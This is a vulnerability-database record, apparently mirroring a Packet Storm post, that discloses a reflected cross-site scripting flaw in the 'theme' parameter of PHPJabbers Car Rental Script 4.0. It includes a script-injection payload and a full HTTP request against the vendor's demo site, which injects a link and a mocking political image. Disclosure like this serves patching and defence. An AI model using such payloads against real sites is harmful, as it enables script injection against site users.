📄 Car Rental Script 4.0 Cross Site Scripting_PACKETSTORM:220734

{
    "lastseen": "2026-05-11T17:18:46",
    "description": "Car Rental Script version 4.0 suffers from a cross site scripting vulnerability...",
    "published": "2026-05-11T00:00:00",
    "modified": "2026-05-11T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Car Rental Script 4.0 Cross Site Scripting",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:220734",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "## Titles: Car-Rental-Script4.0-XSS-Reflected Cross-site scripting\n    (reflected)\n    ## Author: nu11secur1ty\n    ## Date: 05/08/2026\n    ## Vendor: https://www.phpjabbers.com/\n    ## Software: https://www.phpjabbers.com/car-rental-script/\n    ## Reference: https://portswigger.net/web-security/cross-site-scripting\n    \n    ## Description:\n    The value of the theme request parameter is copied into the value of an\n    HTML tag attribute which is encapsulated in double quotation marks. The\n    payload sjw0c\"><script>alert(1)</script>bfadm was submitted in the theme\n    parameter. This input was echoed unmodified in the application's response.\n    This proof-of-concept attack demonstrates that it is possible to inject\n    arbitrary JavaScript into the application's response.\n    \n    STATUS: HIGH- Vulnerability\n    \n    [+]Exploit:\n    \n    ```GET\n    GET\n    /scripts/car-rental-script/preview.php?locale=1&hide=0&theme=theme1sjw0c%22%3E%3Ca%20href=%22\n    https://www.youtube.com/watch?v=Q9pX-pEAFT4%22%20target=%22_blank%22%3E%20%3Cimg%20src=%22https://media1.tenor.com/m/sLjUbG5BVikAAAAd/trump-dance-trump-2024.gif%22%20alt=%22STUPID%22width=%22900%22%20height=%22450%22%3E%20%3C/a%3Ebfadm\n    HTTP/2\n    Host: demo.phpjabbers.com\n    Cookie: CarRental=0cd0c3272fee2e4f0fb2053e6afb3dbc\n    Cache-Control: max-age=0\n    Sec-Ch-Ua: \"Not-A.Brand\";v=\"24\", \"Chromium\";v=\"146\"\n    Sec-Ch-Ua-Mobile: ?0\n    Sec-Ch-Ua-Platform: \"Windows\"\n    Accept-Language: en-US,en;q=0.9\n    Upgrade-Insecure-Requests: 1\n    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\n    (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36\n    Accept:\n    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\n    Sec-Fetch-Site: none\n    Sec-Fetch-Mode: navigate\n    Sec-Fetch-User: ?1\n    Sec-Fetch-Dest: document\n    Accept-Encoding: gzip, deflate, br\n    Priority: u=0, i\n    ```\n    \n    \n    ## Demo PoC:\n    [href](https://www.patreon.com/posts/car-rental-0-xss-157738744)\n    \n    ## Time spent:\n    00:27:00",
    "sourceHref": "https://packetstorm.news/download/220734",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/220734/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}